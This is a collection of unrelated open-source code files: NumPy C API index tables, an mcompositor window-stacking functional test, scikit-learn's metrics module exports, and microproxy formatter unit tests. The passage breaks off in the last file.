'PyArray_Free': (165,),
'PyArray_Converter': (166,),
'PyArray_IntpFromSequence': (167,),
'PyArray_Concatenate': (168,),
'PyArray_InnerProduct': (169,),
'PyArray_MatrixProduct': (170,),
'PyArray_CopyAndTranspose': (171,),
'PyArray_Correlate': (172,),
'PyArray_TypestrConvert': (173,),
'PyArray_DescrConverter': (174,),
'PyArray_DescrConverter2': (175,),
'PyArray_IntpConverter': (176,),
'PyArray_BufferConverter': (177,),
'PyArray_AxisConverter': (178,),
'PyArray_BoolConverter': (179,),
'PyArray_ByteorderConverter': (180,),
'PyArray_OrderConverter': (181,),
'PyArray_EquivTypes': (182,),
'PyArray_Zeros': (183, StealRef(3)),
'PyArray_Empty': (184, StealRef(3)),
'PyArray_Where': (185,),
'PyArray_Arange': (186,),
'PyArray_ArangeObj': (187,),
'PyArray_SortkindConverter': (188,),
'PyArray_LexSort': (189,),
'PyArray_Round': (190,),
'PyArray_EquivTypenums': (191,),
'PyArray_RegisterDataType': (192,),
'PyArray_RegisterCastFunc': (193,),
'PyArray_RegisterCanCast': (194,),
'PyArray_InitArrFuncs': (195,),
'PyArray_IntTupleFromIntp': (196,),
'PyArray_TypeNumFromName': (197,),
'PyArray_ClipmodeConverter': (198,),
'PyArray_OutputConverter': (199,),
'PyArray_BroadcastToShape': (200,),
'_PyArray_SigintHandler': (201,),
'_PyArray_GetSigintBuf': (202,),
'PyArray_DescrAlignConverter': (203,),
'PyArray_DescrAlignConverter2': (204,),
'PyArray_SearchsideConverter': (205,),
'PyArray_CheckAxis': (206,),
'PyArray_OverflowMultiplyList': (207,),
'PyArray_CompareString': (208,),
'PyArray_MultiIterFromObjects': (209,),
'PyArray_GetEndianness': (210,),
'PyArray_GetNDArrayCFeatureVersion': (211,),
'PyArray_Correlate2': (212,),
'PyArray_NeighborhoodIterNew': (213,),
# End 1.5 API
'PyArray_SetDatetimeParseFunction': (219,),
'PyArray_DatetimeToDatetimeStruct': (220,),
'PyArray_TimedeltaToTimedeltaStruct': (221,),
'PyArray_DatetimeStructToDatetime': (222,),
'PyArray_TimedeltaStructToTimedelta': (223,),
# NDIter API
'NpyIter_New': (224,),
'NpyIter_MultiNew': (225,),
'NpyIter_AdvancedNew': (226,),
'NpyIter_Copy': (227,),
'NpyIter_Deallocate': (228,),
'NpyIter_HasDelayedBufAlloc': (229,),
'NpyIter_HasExternalLoop': (230,),
'NpyIter_EnableExternalLoop': (231,),
'NpyIter_GetInnerStrideArray': (232,),
'NpyIter_GetInnerLoopSizePtr': (233,),
'NpyIter_Reset': (234,),
'NpyIter_ResetBasePointers': (235,),
'NpyIter_ResetToIterIndexRange': (236,),
'NpyIter_GetNDim': (237,),
'NpyIter_GetNOp': (238,),
'NpyIter_GetIterNext': (239,),
'NpyIter_GetIterSize': (240,),
'NpyIter_GetIterIndexRange': (241,),
'NpyIter_GetIterIndex': (242,),
'NpyIter_GotoIterIndex': (243,),
'NpyIter_HasMultiIndex': (244,),
'NpyIter_GetShape': (245,),
'NpyIter_GetGetMultiIndex': (246,),
'NpyIter_GotoMultiIndex': (247,),
'NpyIter_RemoveMultiIndex': (248,),
'NpyIter_HasIndex': (249,),
'NpyIter_IsBuffered': (250,),
'NpyIter_IsGrowInner': (251,),
'NpyIter_GetBufferSize': (252,),
'NpyIter_GetIndexPtr': (253,),
'NpyIter_GotoIndex': (254,),
'NpyIter_GetDataPtrArray': (255,),
'NpyIter_GetDescrArray': (256,),
'NpyIter_GetOperandArray': (257,),
'NpyIter_GetIterView': (258,),
'NpyIter_GetReadFlags': (259,),
'NpyIter_GetWriteFlags': (260,),
'NpyIter_DebugPrint': (261,),
'NpyIter_IterationNeedsAPI': (262,),
'NpyIter_GetInnerFixedStrideArray': (263,),
'NpyIter_RemoveAxis': (264,),
'NpyIter_GetAxisStrideArray': (265,),
'NpyIter_RequiresBuffering': (266,),
'NpyIter_GetInitialDataPtrArray': (267,),
'NpyIter_CreateCompatibleStrides': (268,),
#
'PyArray_CastingConverter': (269,),
'PyArray_CountNonzero': (270,),
'PyArray_PromoteTypes': (271,),
'PyArray_MinScalarType': (272,),
'PyArray_ResultType': (273,),
'PyArray_CanCastArrayTo': (274,),
'PyArray_CanCastTypeTo': (275,),
'PyArray_EinsteinSum': (276,),
'PyArray_NewLikeArray': (277, StealRef(3), NonNull(1)),
'PyArray_GetArrayParamsFromObject': (278,),
'PyArray_ConvertClipmodeSequence': (279,),
'PyArray_MatrixProduct2': (280,),
# End 1.6 API
'NpyIter_IsFirstVisit': (281,),
'PyArray_SetBaseObject': (282, StealRef(2)),
'PyArray_CreateSortedStridePerm': (283,),
'PyArray_RemoveAxesInPlace': (284,),
'PyArray_DebugPrint': (285,),
'PyArray_FailUnlessWriteable': (286,),
'PyArray_SetUpdateIfCopyBase': (287, StealRef(2)),
'PyDataMem_NEW': (288,),
'PyDataMem_FREE': (289,),
'PyDataMem_RENEW': (290,),
'PyDataMem_SetEventHook': (291,),
'PyArray_MapIterSwapAxes': (293,),
'PyArray_MapIterArray': (294,),
'PyArray_MapIterNext': (295,),
# End 1.7 API
'PyArray_Partition': (296,),
'PyArray_ArgPartition': (297,),
'PyArray_SelectkindConverter': (298,),
'PyDataMem_NEW_ZEROED': (299,),
# End 1.8 API
# End 1.9 API
'PyArray_CheckAnyScalarExact': (300, NonNull(1)),
# End 1.10 API
'PyArray_MapIterArrayCopyIfOverlap': (301,),
# End 1.13 API
'PyArray_ResolveWritebackIfCopy': (302,),
'PyArray_SetWritebackIfCopyBase': (303,),
# End 1.14 API
}
ufunc_types_api = {
'PyUFunc_Type': (0,)
}
ufunc_funcs_api = {
'PyUFunc_FromFuncAndData': (1,),
'PyUFunc_RegisterLoopForType': (2,),
'PyUFunc_GenericFunction': (3,),
'PyUFunc_f_f_As_d_d': (4,),
'PyUFunc_d_d': (5,),
'PyUFunc_f_f': (6,),
'PyUFunc_g_g': (7,),
'PyUFunc_F_F_As_D_D': (8,),
'PyUFunc_F_F': (9,),
'PyUFunc_D_D': (10,),
'PyUFunc_G_G': (11,),
'PyUFunc_O_O': (12,),
'PyUFunc_ff_f_As_dd_d': (13,),
'PyUFunc_ff_f': (14,),
'PyUFunc_dd_d': (15,),
'PyUFunc_gg_g': (16,),
'PyUFunc_FF_F_As_DD_D': (17,),
'PyUFunc_DD_D': (18,),
'PyUFunc_FF_F': (19,),
'PyUFunc_GG_G': (20,),
'PyUFunc_OO_O': (21,),
'PyUFunc_O_O_method': (22,),
'PyUFunc_OO_O_method': (23,),
'PyUFunc_On_Om': (24,),
'PyUFunc_GetPyValues': (25,),
'PyUFunc_checkfperr': (26,),
'PyUFunc_clearfperr': (27,),
'PyUFunc_getfperr': (28,),
'PyUFunc_handlefperr': (29,),
'PyUFunc_ReplaceLoopBySignature': (30,),
'PyUFunc_FromFuncAndDataAndSignature': (31,),
'PyUFunc_SetUsesArraysAsData': (32,),
# End 1.5 API
'PyUFunc_e_e': (33,),
'PyUFunc_e_e_As_f_f': (34,),
'PyUFunc_e_e_As_d_d': (35,),
'PyUFunc_ee_e': (36,),
'PyUFunc_ee_e_As_ff_f': (37,),
'PyUFunc_ee_e_As_dd_d': (38,),
# End 1.6 API
'PyUFunc_DefaultTypeResolver': (39,),
'PyUFunc_ValidateCasting': (40,),
# End 1.7 API
'PyUFunc_RegisterLoopForDescr': (41,),
# End 1.8 API
'PyUFunc_FromFuncAndDataAndSignatureAndIdentity': (42,),
# End 1.16 API
}
# List of all the dicts which define the C API
# XXX: DO NOT CHANGE THE ORDER OF TUPLES BELOW !
multiarray_api = (
multiarray_global_vars,
multiarray_scalar_bool_values,
multiarray_types_api,
multiarray_funcs_api,
)
ufunc_api = (
ufunc_funcs_api,
ufunc_types_api
)
full_api = multiarray_api + ufunc_api
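# Illustrative sketch (not part of the original generator): each dict above maps
# an exported name to a tuple whose first element is that symbol's fixed slot in
# the C API table, which is why the order/indices must never change.  A flat
# {index: name} table could be rebuilt from `full_api` like this; the helper name
# is hypothetical.
def _api_index_table(api_dicts):
    """Return {slot_index: symbol_name} for every entry in the given API dicts."""
    table = {}
    for api_dict in api_dicts:
        for name, spec in api_dict.items():
            table[spec[0]] = name
    return table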
|
bsd-3-clause
|
nemomobile-graveyard/mcompositor
|
tests/functional/test19.py
|
4
|
1948
|
#!/usr/bin/python
# Check that initial_state==IconicState windows can be raised/activated.
#* Test steps
# * show an initial_state==IconicState application window
# * activate it
# * check that it's on top
# * close it
# * show an initial_state==IconicState application window
# * raise it
#* Post-conditions
# * check that it's on top
import os, re, sys, time
if os.system('mcompositor-test-init.py'):
sys.exit(1)
fd = os.popen('windowstack m')
s = fd.read(5000)
win_re = re.compile('^0x[0-9a-f]+')
home_win = 0
for l in s.splitlines():
if re.search(' DESKTOP viewable ', l.strip()):
home_win = win_re.match(l.strip()).group()
if home_win == 0:
print 'FAIL: desktop window not found'
sys.exit(1)
# create minimised application window
fd = os.popen('windowctl Ikn')
app_win = fd.readline().strip()
time.sleep(2)
# activate it
os.popen('windowctl A %s' % app_win)
time.sleep(2)
ret = 0
fd = os.popen('windowstack m')
s = fd.read(5000)
for l in s.splitlines():
if re.search("%s " % app_win, l.strip()):
print app_win, 'found'
break
elif re.search("%s " % home_win, l.strip()):
print 'FAIL: activation failed'
print 'Failed stack:\n', s
ret = 1
break
# close it
os.popen('pkill windowctl')
time.sleep(1)
# create minimised application window
fd = os.popen('windowctl Ikn')
app_win = fd.readline().strip()
time.sleep(2)
# raise it
os.popen('windowctl V %s None' % app_win)
time.sleep(2)
fd = os.popen('windowstack m')
s = fd.read(5000)
for l in s.splitlines():
if re.search("%s " % app_win, l.strip()):
print app_win, 'found'
break
elif re.search("%s " % home_win, l.strip()):
print 'FAIL: raising failed'
print 'Failed stack:\n', s
ret = 1
break
# cleanup
os.popen('pkill windowctl')
time.sleep(1)
if os.system('/usr/bin/gconftool-2 --type bool --set /desktop/meego/notifications/previews_enabled true'):
print 'cannot re-enable notifications'
sys.exit(ret)
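# Illustrative refactoring sketch (not part of the original test): the two
# stacking checks above scan 'windowstack m' output the same way; a hypothetical
# helper could factor that out.  Names below are assumptions.
#
#   def app_above_home(app_win, home_win):
#       s = os.popen('windowstack m').read(5000)
#       for l in s.splitlines():
#           if re.search("%s " % app_win, l.strip()):
#               return True
#           elif re.search("%s " % home_win, l.strip()):
#               return False
#       return False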
|
lgpl-2.1
|
djgagne/scikit-learn
|
sklearn/metrics/__init__.py
|
214
|
3440
|
"""
The :mod:`sklearn.metrics` module includes score functions, performance metrics
and pairwise metrics and distance computations.
"""
from .ranking import auc
from .ranking import average_precision_score
from .ranking import coverage_error
from .ranking import label_ranking_average_precision_score
from .ranking import label_ranking_loss
from .ranking import precision_recall_curve
from .ranking import roc_auc_score
from .ranking import roc_curve
from .classification import accuracy_score
from .classification import classification_report
from .classification import cohen_kappa_score
from .classification import confusion_matrix
from .classification import f1_score
from .classification import fbeta_score
from .classification import hamming_loss
from .classification import hinge_loss
from .classification import jaccard_similarity_score
from .classification import log_loss
from .classification import matthews_corrcoef
from .classification import precision_recall_fscore_support
from .classification import precision_score
from .classification import recall_score
from .classification import zero_one_loss
from .classification import brier_score_loss
from . import cluster
from .cluster import adjusted_mutual_info_score
from .cluster import adjusted_rand_score
from .cluster import completeness_score
from .cluster import consensus_score
from .cluster import homogeneity_completeness_v_measure
from .cluster import homogeneity_score
from .cluster import mutual_info_score
from .cluster import normalized_mutual_info_score
from .cluster import silhouette_samples
from .cluster import silhouette_score
from .cluster import v_measure_score
from .pairwise import euclidean_distances
from .pairwise import pairwise_distances
from .pairwise import pairwise_distances_argmin
from .pairwise import pairwise_distances_argmin_min
from .pairwise import pairwise_kernels
from .regression import explained_variance_score
from .regression import mean_absolute_error
from .regression import mean_squared_error
from .regression import median_absolute_error
from .regression import r2_score
from .scorer import make_scorer
from .scorer import SCORERS
from .scorer import get_scorer
__all__ = [
'accuracy_score',
'adjusted_mutual_info_score',
'adjusted_rand_score',
'auc',
'average_precision_score',
'classification_report',
'cluster',
'completeness_score',
'confusion_matrix',
'consensus_score',
'coverage_error',
'euclidean_distances',
'explained_variance_score',
'f1_score',
'fbeta_score',
'get_scorer',
'hamming_loss',
'hinge_loss',
'homogeneity_completeness_v_measure',
'homogeneity_score',
'jaccard_similarity_score',
'label_ranking_average_precision_score',
'label_ranking_loss',
'log_loss',
'make_scorer',
'matthews_corrcoef',
'mean_absolute_error',
'mean_squared_error',
'median_absolute_error',
'mutual_info_score',
'normalized_mutual_info_score',
'pairwise_distances',
'pairwise_distances_argmin',
    'pairwise_distances_argmin_min',
'pairwise_kernels',
'precision_recall_curve',
'precision_recall_fscore_support',
'precision_score',
'r2_score',
'recall_score',
'roc_auc_score',
'roc_curve',
'SCORERS',
'silhouette_samples',
'silhouette_score',
'v_measure_score',
'zero_one_loss',
'brier_score_loss',
]
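# Illustrative usage sketch (not part of this module): everything re-exported
# above is intended to be imported straight from sklearn.metrics, e.g.
#
#     from sklearn.metrics import accuracy_score, confusion_matrix
#     accuracy_score([0, 1, 1, 0], [0, 1, 0, 0])    # -> 0.75
#     confusion_matrix([0, 1, 1, 0], [0, 1, 0, 0])  # -> array([[2, 0], [1, 1]])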
|
bsd-3-clause
|
mike820324/microProxy
|
microproxy/test/viewer/test_formatter.py
|
1
|
20945
|
import StringIO
import gzip
import mock
from pygments.token import Token
import unittest
from microproxy.context import HttpHeaders
from microproxy.viewer.formatter import (
CssFormatter, ConsoleFormatter, HtmlFormatter, JsFormatter,
JsonFormatter, PlainTextFormatter, TuiFormatter,
URLEncodedFormatter, XmlFormatter)
def _gzip_body(body):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(body)
return out.getvalue()
class TestCssFormatter(unittest.TestCase):
def setUp(self):
self.formatter = CssFormatter()
self.css_content = ".class {background: black} #id {color: red}"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/css"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.css_content),
(".class {\n"
" background: black\n"
" }\n"
"#id {\n"
" color: red\n"
" }"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.css_content)
self.assertEqual(len(contents), 6)
self.assertEqual(
contents[0].content,
[(Token.Name.Class, u'.class'), (Token.Text, u' '), (Token.Punctuation, u'{')])
self.assertEqual(
contents[1].content,
[(Token.Name.Builtin, u'background'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Name.Builtin, u'black')])
self.assertEqual(
contents[2].content,
[(Token.Punctuation, u'}')])
self.assertEqual(
contents[3].content,
[(Token.Name.Namespace, u'#id'), (Token.Text, u' '), (Token.Punctuation, u'{')])
self.assertEqual(
contents[4].content,
[(Token.Name.Builtin, u'color'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Name.Builtin, u'red')])
self.assertEqual(
contents[5].content,
[(Token.Punctuation, u'}')])
class TestJsFormatter(unittest.TestCase):
def setUp(self):
self.formatter = JsFormatter()
self.js_content = "var person = {firstname:\"John\",lastname:\"Doe\",age:50,eyecolor:\"blue\"};document.getElementById(\"demo\").innerHTML =person.firstname + \" is \" + person.age + \" years old.\";"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/javascript"))
self.assertTrue(self.formatter.match(None, "application/javascript"))
self.assertTrue(self.formatter.match(None, "application/x-javascript"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.js_content),
("var person = {\n"
" firstname: \"John\",\n"
" lastname: \"Doe\",\n"
" age: 50,\n"
" eyecolor: \"blue\"\n"
"};\n"
"document.getElementById(\"demo\").innerHTML "
"= person.firstname + \" is \" + person.age + \" years old.\";"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.js_content)
self.assertEqual(len(contents), 7)
self.assertEqual(
contents[0].content,
[(Token.Keyword.Declaration, u'var'), (Token.Text, u' '), (Token.Name.Other, u'person'), (Token.Text, u' '), (Token.Operator, u'='), (Token.Text, u' '), (Token.Punctuation, u'{')])
self.assertEqual(
contents[1].content,
[(Token.Name.Other, u'firstname'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.String.Double, u'"John"'), (Token.Punctuation, u',')])
self.assertEqual(
contents[2].content,
[(Token.Name.Other, u'lastname'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.String.Double, u'"Doe"'), (Token.Punctuation, u',')])
self.assertEqual(
contents[3].content,
[(Token.Name.Other, u'age'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.Number.Integer, u'50'), (Token.Punctuation, u',')])
self.assertEqual(
contents[4].content,
[(Token.Name.Other, u'eyecolor'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.String.Double, u'"blue"')])
self.assertEqual(
contents[5].content,
[(Token.Punctuation, u'}'), (Token.Punctuation, u';')])
self.assertEqual(
contents[6].content,
[(Token.Name.Builtin, u'document'), (Token.Punctuation, u'.'), (Token.Name.Other, u'getElementById'),
(Token.Punctuation, u'('), (Token.Literal.String.Double, u'"demo"'),
(Token.Punctuation, u')'), (Token.Punctuation, u'.'), (Token.Name.Other, u'innerHTML'),
(Token.Text, u' '), (Token.Operator, u'='), (Token.Text, u' '),
(Token.Name.Other, u'person'), (Token.Punctuation, u'.'),
(Token.Name.Other, u'firstname'), (Token.Text, u' '),
(Token.Operator, u'+'), (Token.Text, u' '), (Token.Literal.String.Double, u'" is "'),
(Token.Text, u' '), (Token.Operator, u'+'), (Token.Text, u' '),
(Token.Name.Other, u'person'), (Token.Punctuation, u'.'), (Token.Name.Other, u'age'),
(Token.Text, u' '), (Token.Operator, u'+'), (Token.Text, u' '),
(Token.Literal.String.Double, u'" years old."'), (Token.Punctuation, u';')])
class TestHtmlFormatter(unittest.TestCase):
def setUp(self):
self.formatter = HtmlFormatter()
self.html_content = (
"<html><head><title>Hello MicroProxy</title</head>"
"<body>Hello MicroProxy</body></html>")
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/html"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.html_content),
("<html>\n"
" <head>\n"
" <title>Hello MicroProxy</title>\n"
" </head>\n"
" <body>Hello MicroProxy</body>\n"
"</html>\n"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.html_content)
self.assertEqual(len(contents), 6)
self.assertEqual(
contents[0].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'html'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[1].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'head'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[2].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'title'), (Token.Punctuation, u'>'),
(Token.Text, u'Hello MicroProxy'), (Token.Punctuation, u'<'), (Token.Punctuation, u'/'),
(Token.Name.Tag, u'title'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[3].content,
[(Token.Punctuation, u'<'), (Token.Punctuation, u'/'), (Token.Name.Tag, u'head'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[4].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'body'), (Token.Punctuation, u'>'),
(Token.Text, u'Hello MicroProxy'), (Token.Punctuation, u'<'), (Token.Punctuation, u'/'),
(Token.Name.Tag, u'body'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[5].content,
[(Token.Punctuation, u'<'), (Token.Punctuation, u'/'), (Token.Name.Tag, u'html'), (Token.Punctuation, u'>')])
class TestJsonFormatter(unittest.TestCase):
def setUp(self):
self.formatter = JsonFormatter()
self.json_content = "{\"title\":\"MicroPorxy\",\"rate\":100,\"awesome\":true}"
def test_match(self):
self.assertTrue(self.formatter.match(None, "application/json"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.json_content),
("{\n"
" \"title\": \"MicroPorxy\", \n"
" \"rate\": 100, \n"
" \"awesome\": true\n"
"}"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.json_content)
self.assertEqual(len(contents), 5)
self.assertEqual(
contents[0].content,
[(Token.Punctuation, u'{')])
self.assertEqual(
contents[1].content,
[(Token.Name.Tag, u'"title"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Literal.String.Double, u'"MicroPorxy"'), (Token.Punctuation, u',')])
self.assertEqual(
contents[2].content,
[(Token.Name.Tag, u'"rate"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Literal.Number.Integer, u'100'), (Token.Punctuation, u',')])
self.assertEqual(
contents[3].content,
[(Token.Name.Tag, u'"awesome"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Keyword.Constant, u'true')])
self.assertEqual(
contents[4].content,
[(Token.Punctuation, u'}')])
class TestXmlFormatter(unittest.TestCase):
def setUp(self):
self.formatter = XmlFormatter()
self.xml_content = "<microproxy><title>MicroProxy</title><rate>100</rate><awesome>true</awesome></microproxy>"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/xml"))
self.assertTrue(self.formatter.match(None, "application/xml"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.xml_content),
("<microproxy>\n"
" <title>MicroProxy</title>\n"
" <rate>100</rate>\n"
" <awesome>true</awesome>\n"
"</microproxy>\n"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.xml_content)
self.assertEqual(len(contents), 5)
self.assertEqual(
contents[0].content,
[(Token.Name.Tag, u'<microproxy'), (Token.Name.Tag, u'>')])
self.assertEqual(
contents[1].content,
[(Token.Name.Tag, u'<title'), (Token.Name.Tag, u'>'), (Token.Text, u'MicroProxy'),
(Token.Name.Tag, u'</title>')])
self.assertEqual(
contents[2].content,
[(Token.Name.Tag, u'<rate'), (Token.Name.Tag, u'>'), (Token.Text, u'100'),
(Token.Name.Tag, u'</rate>')])
self.assertEqual(
contents[3].content,
[(Token.Name.Tag, u'<awesome'), (Token.Name.Tag, u'>'), (Token.Text, u'true'),
(Token.Name.Tag, u'</awesome>')])
self.assertEqual(
contents[4].content,
[(Token.Name.Tag, u'</microproxy>')])
class TestPlainTextFormatter(unittest.TestCase):
def setUp(self):
self.formatter = PlainTextFormatter()
self.content = "Hello,\nthis is MicroProxy!"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/plain"))
self.assertFalse(self.formatter.match(None, "text/css"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.content),
"Hello,\nthis is MicroProxy!")
def test_format_tui(self):
contents = self.formatter.format_tui(self.content)
self.assertEqual(len(contents), 2)
self.assertEqual(
contents[0].content, "Hello,")
self.assertEqual(
contents[1].content, "this is MicroProxy!")
class TestURLEncodedFormatter(unittest.TestCase):
def setUp(self):
self.formatter = URLEncodedFormatter()
self.normal_content = "arg1=value1&arg2=100&arg3=true&longarg=this%20is%20long"
self.complex_content = (
"arg1=value1&"
"jsonarg={\"key\":\"value\"}&"
"xmlarg=<xml><text>hello</text></xml>")
def test_match(self):
self.assertTrue(self.formatter.match(None, "application/x-www-form-urlencoded"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body_normal(self):
self.assertEqual(
self.formatter.format_body(self.normal_content),
("arg1 : value1\n"
"arg2 : 100\n"
"arg3 : true\n"
"longarg: this is long"))
def test_format_tui_normal(self):
contents = self.formatter.format_tui(self.normal_content)
self.assertEqual(len(contents), 4)
self.assertEqual(contents[0].content, "arg1 : value1")
self.assertEqual(contents[1].content, "arg2 : 100")
self.assertEqual(contents[2].content, "arg3 : true")
self.assertEqual(contents[3].content, "longarg: this is long")
def test_format_body_complex(self):
self.assertEqual(
self.formatter.format_body(self.complex_content),
("arg1 : value1\n"
"jsonarg:\n"
"{\n"
" \"key\": \"value\"\n"
"}\n"
"xmlarg :\n"
"<xml>\n"
" <text>hello</text>\n"
"</xml>\n"))
def test_format_tui_complex(self):
contents = self.formatter.format_tui(self.complex_content)
self.assertEqual(len(contents), 9)
self.assertEqual(contents[0].content, "arg1 : value1")
self.assertEqual(contents[1].content, "jsonarg:")
self.assertEqual(contents[2].content, [(Token.Punctuation, u'{')])
self.assertEqual(
contents[3].content,
[(Token.Name.Tag, u'"key"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Literal.String.Double, u'"value"')])
self.assertEqual(contents[4].content, [(Token.Punctuation, u'}')])
self.assertEqual(contents[5].content, "xmlarg :")
self.assertEqual(
contents[6].content,
[(Token.Name.Tag, u'<xml'), (Token.Name.Tag, u'>')])
self.assertEqual(
contents[7].content,
[(Token.Name.Tag, u'<text'), (Token.Name.Tag, u'>'), (Token.Text, u'hello'),
(Token.Name.Tag, u'</text>')])
self.assertEqual(contents[8].content, [(Token.Name.Tag, u'</xml>')])
def test_format_empty(self):
self.assertEqual(
self.formatter.format_body(""), "")
self.assertEqual(
self.formatter.format_tui(""), [])
class TestFormatterMixin(object):
DEFAULT_HEADERS = HttpHeaders([
("content-type", "text/plain; charset=utf-8")])
def setUp(self):
self.mock_formatters = mock.Mock()
self.formatters = [
self.mock_formatters.first,
self.mock_formatters.second]
self.formatter = None
def assert_called(self, formatter, *args, **kwargs):
raise NotImplementedError
def assert_not_called(self, formatter):
raise NotImplementedError
def test_match_first(self):
self.mock_formatters.first.match = mock.Mock(
return_value=True)
self.mock_formatters.first.format_tui = mock.Mock(
return_value="formatted body")
self.mock_formatters.first.format_console = mock.Mock(
return_value="formatted body")
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, "formatted body")
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_not_called()
self.assert_called(self.mock_formatters.first, "body")
self.assert_not_called(self.mock_formatters.second)
def test_match_second(self):
self.mock_formatters.first.match = mock.Mock(
return_value=False)
self.mock_formatters.second.match = mock.Mock(
return_value=True)
self.mock_formatters.second.format_tui = mock.Mock(
return_value="formatted body")
self.mock_formatters.second.format_console = mock.Mock(
return_value="formatted body")
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, "formatted body")
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.assert_not_called(self.mock_formatters.first)
self.assert_called(self.mock_formatters.second, "body")
def test_no_match(self):
self.mock_formatters.first.match = mock.Mock(
return_value=False)
self.mock_formatters.second.match = mock.Mock(
return_value=False)
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, self.formatter.default("body"))
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.assert_not_called(self.mock_formatters.first)
self.assert_not_called(self.mock_formatters.second)
    def test_match_but_format_failed(self):
self.mock_formatters.first.match = mock.Mock(
return_value=True)
self.mock_formatters.second.match = mock.Mock(
return_value=False)
self.mock_formatters.first.format_tui = mock.Mock(
side_effect=ValueError)
self.mock_formatters.first.format_console = mock.Mock(
side_effect=ValueError)
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, self.formatter.default("body"))
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.assert_called(self.mock_formatters.first, "body")
self.assert_not_called(self.mock_formatters.second)
def test_gzip(self):
self.mock_formatters.first.match = mock.Mock(
return_value=True)
self.mock_formatters.first.format_tui = mock.Mock(
return_value="formatted body")
self.mock_formatters.first.format_console = mock.Mock(
return_value="formatted body")
headers = HttpHeaders([
("content-type", "text/plain"),
("content-encoding", "gzip")])
formatted_body = self.formatter.format_body(
_gzip_body("body"), headers)
self.assertEqual(formatted_body, "formatted body")
self.mock_formatters.first.match.assert_called_with(
headers, "text/plain")
self.mock_formatters.second.match.assert_not_called()
self.assert_called(self.mock_formatters.first, "body")
self.assert_not_called(self.mock_formatters.second)
def test_no_content_type(self):
self.mock_formatters.first.match = mock.Mock(
return_value=False)
self.mock_formatters.second.match = mock.Mock(
return_value=False)
empty_headers = HttpHeaders([])
formatted_body = self.formatter.format_body("body", empty_headers)
self.assertEqual(formatted_body, self.formatter.default("body"))
self.mock_formatters.first.match.assert_called_with(
empty_headers, "")
self.mock_formatters.second.match.assert_called_with(
empty_headers, "")
self.assert_not_called(self.mock_formatters.first)
self.assert_not_called(self.mock_formatters.second)
class TestTuiFormatter(TestFormatterMixin, unittest.TestCase):
def setUp(self):
super(TestTuiFormatter, self).setUp()
self.formatter = TuiFormatter(self.formatters)
def assert_called(self, formatter, *args, **kwargs):
formatter.format_tui.assert_called_with(*args, **kwargs)
def assert_not_called(self, formatter):
formatter.format_tui.assert_not_called()
class TestConsoleFormatter(TestFormatterMixin, unittest.TestCase):
def setUp(self):
super(TestConsoleFormatter, self).setUp()
self.formatter = ConsoleFormatter(self.formatters)
def assert_called(self, formatter, *args, **kwargs):
formatter.format_console.assert_called_with(*args, **kwargs)
def assert_not_called(self, formatter):
formatter.format_console.assert_not_called()
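# Minimal dispatch sketch of what TestFormatterMixin exercises (not the real
# microproxy implementation; the match()/format_* method names come from the
# mocks above, everything else is an assumption): pick the first formatter whose
# match() accepts the content type, gunzip first if needed, and fall back to
# default() when nothing matches or formatting raises.
#
#   def _format_with(formatters, body, headers, call, default):
#       content_type = headers.get("content-type", "").split(";")[0].strip()
#       if headers.get("content-encoding") == "gzip":
#           body = gzip.GzipFile(fileobj=StringIO.StringIO(body)).read()
#       for formatter in formatters:
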